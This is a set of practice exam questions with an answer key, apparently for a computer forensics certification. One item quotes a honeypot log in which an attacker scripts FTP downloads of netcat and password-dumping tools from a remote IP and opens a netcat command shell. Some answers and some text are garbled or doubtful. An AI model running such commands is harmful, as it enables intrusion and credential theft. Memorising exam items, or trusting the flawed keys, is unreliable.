Refresh 312-49v9 Samples For ECCouncil Computer Hacking Forensic Investigator (V9) Certification

NEW QUESTION 1

First responder is a person who arrives first at the crime scene and accesses the victim's computer system after the incident. He or She is responsible for protecting, integrating, and preserving the evidence obtained from the crime scene. Which of the following is not a role of first responder?

• A. Identify and analyze the crime scene
• B. Protect and secure the crime scene
• C. Package and transport the electronic evidence to forensics lab
• D. Prosecute the suspect in court of law

Answer: D

NEW QUESTION 2

You have been given the task to investigate web attacks on a Windows-based server.
Which of the following commands will you use to look at which sessions the machine has opened with other systems?

• A. Net sessions
• B. Net use
• C. Net config
• D. Net share

Answer: B

NEW QUESTION 3

Shortcuts are the files with the extension .Ink that are created and are accessed by the users. These files provide you with information about:

• A. Files or network shares
• B. Running application
• C. Application logs
• D. System logs

Answer: A

NEW QUESTION 4

You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?

• A. The registry
• B. The swapfile
• C. The recycle bin
• D. The metadata

Answer: B

NEW QUESTION 5

George is a senior security analyst working for a state agency in Florida. His state's congress just passed a bill mandating every state agency to undergo a security audit annually. After learning what will be required, George needs to implement an IDS as soon as possible before the first audit occurs. The state bill requires that an IDS with a "time-based induction machine" be used. What IDS feature must George implement to meet this requirement?

• A. Pattern matching
• B. Statistical-based anomaly detection
• C. Real-time anomaly detection
• D. Signature-based anomaly detection

Answer: C

NEW QUESTION 6

Which of the following commands shows you the names of all open shared files on a server and number of file locks on each file?

• A. Net sessions
• B. Net file
• C. Netconfig
• D. Net share

Answer: B

NEW QUESTION 7

Click on the Exhibit Button Paulette works for an IT security consulting company that is currently performing an audit for the firm ACE Unlimited. Paulette's duties include logging on to all the company's network equipment to ensure IOS versions are up-to-date and all the other security settings are as stringent as possible. Paulette presents the following screenshot to her boss so he can inform the client about necessary changes need to be made. From the screenshot, what changes should the client company make?

• A. The banner should include the Cisco tech support contact information as well
• B. The banner should have more detail on the version numbers for the networkeQuipment
• C. The banner should not state "only authorized IT personnel may proceed"
• D. Remove any identifying numbers, names, or version information

Answer: D

NEW QUESTION 8

A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?

• A. Searching for evidence themselves would not have any ill effects
• B. Searching could possibly crash the machine or device
• C. Searching creates cache files, which would hinder the investigation
• D. Searching can change date/time stamps

Answer: D

NEW QUESTION 9

Network forensics can be defined as the sniffing, recording, acquisition and analysis of the network traffic and event logs in order to investigate a network security incident.

• A. True
• B. False

Answer: A

NEW QUESTION 10

Jones had been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the system for a period of three weeks. However law enforcement agencies were recording his every activity and this was later presented as evidence. The organization had used a virtual environment to trap Jones. What is a virtual environment?

• A. A system using Trojaned commands
• B. A honeypot that traps hackers
• C. An environment set up after the user logs in
• D. An environment set up before an user logs in

Answer: B

NEW QUESTION 11

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?

• A. Passive IDS
• B. Active IDS
• C. NIPS
• D. Progressive IDS

Answer: B

NEW QUESTION 12

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00
>>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?

• A. It is a local exploit where the attacker logs in using username johna2k
• B. There are two attackers on the system – johna2k and haxedj00
• C. The attack is a remote exploit and the hacker downloads three files
• D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer: C

Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.

NEW QUESTION 13

In an echo data hiding technique, the secret message is embedded into a ____ as an echo.

• A. Cover audio signal
• B. Phase spectrum of a digital signal
• C. Pseudo-random signal
• D. Pseudo- spectrum signal

Answer: A

NEW QUESTION 14

You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors?

• A. 0:1000, 150
• B. 0:1709, 150
• C. 1:1709, 150
• D. 0:1709-1858

Answer: B

Explanation:
DriveSpy can except two different formats: Drive #:Start Sector, # Sectors Drive#:Start Sector-Absolute End Sector. Drive # is zero based
Both Answer B and D would appear correct, and both formats are valid.

NEW QUESTION 15

Which is not a part of environmental conditions of a forensics lab?

• A. Large dimensions of the room
• B. Good cooling system to overcome excess heat generated by the work station
• C. Allocation of workstations as per the room dimensions
• D. Open windows facing the public road

Answer: D

NEW QUESTION 16

In which step of the computer forensics investigation methodology would you run MD5 checksum on the evidence?

• A. Obtain search warrant
• B. Evaluate and secure the scene
• C. Collect the evidence
• D. Acquire the data

Answer: D

NEW QUESTION 17

Hash injection attack allows attackers to inject a compromised hash into a local session and use the hash to validate network resources.

• A. True
• B. False

Answer: A

NEW QUESTION 18

Davidson Trucking is a small transportation company that has three local offices in Detroit Michigan. Ten female employees that work for the company have gone to an attorney reporting that male employees repeatedly harassed them and that management did nothing to stop the problem. Davidson has employee policies that outline all company guidelines, including awareness on harassment and how it will not be tolerated. When the case is brought to court, whom should the prosecuting attorney call upon for not upholding company policy?

• A. IT personnel
• B. Employees themselves
• C. Supervisors
• D. Administrative assistant in charge of writing policies

Answer: C

NEW QUESTION 19

Data is striped at a byte level across multiple drives and parity information is distributed among all member drives.

What RAID level is represented here?

• A. RAID Level0
• B. RAID Level 1
• C. RAID Level 3
• D. RAID Level 5

Answer: D

NEW QUESTION 20

What is a first sector ("sector zero") of a hard disk?

• A. Master boot record
• B. System boot record
• C. Secondary boot record
• D. Hard disk boot record

Answer: A

NEW QUESTION 21

What must be obtained before an investigation is carried out at a location?

• A. Search warrant
• B. Subpoena
• C. Habeas corpus
• D. Modus operandi

Answer: A

NEW QUESTION 22

An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are ____ media used to store large amounts of data and are not affected by the magnet.

• A. Magnetic
• B. Optical
• C. Anti-Magnetic
• D. Logical

Answer: B

NEW QUESTION 23

You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message?

• A. The X509 Address
• B. The SMTP reply Address
• C. The E-mail Header
• D. The Host Domain Name

Answer: C

NEW QUESTION 24

Which of the following steganography types hides the secret message in a specifically designed pattern on the document that is unclear to the average reader?

• A. Open code steganography
• B. Visual semagrams steganography
• C. Text semagrams steganography
• D. Technical steganography

Answer: A

NEW QUESTION 25

In the context of file deletion process, which of the following statement holds true?

• A. When files are deleted, the data is overwritten and the cluster marked as available
• B. The longer a disk is in use, the less likely it is that deleted files will be overwritten
• C. While booting, the machine may create temporary files that can delete evidence
• D. Secure delete programs work by completely overwriting the file in one go

Answer: C

NEW QUESTION 26

What does the superblock in Linux define?

• A. file synames
• B. disk geometr
• C. location of the first inode
• D. available space

Answer: C

NEW QUESTION 27

An on-site incident response team is called to investigate an alleged case of computer tampering within their company. Before proceeding with the investigation, the CEO informs them that the incident will be classified as ow level? How long will the team have to
respond to the incident?the investigation, the CEO informs them that the incident will be classified as ?ow level? How long will the team have to respond to the incident?

• A. One working day
• B. Two working days
• C. Immediately
• D. Four hours

Answer: A

NEW QUESTION 28
......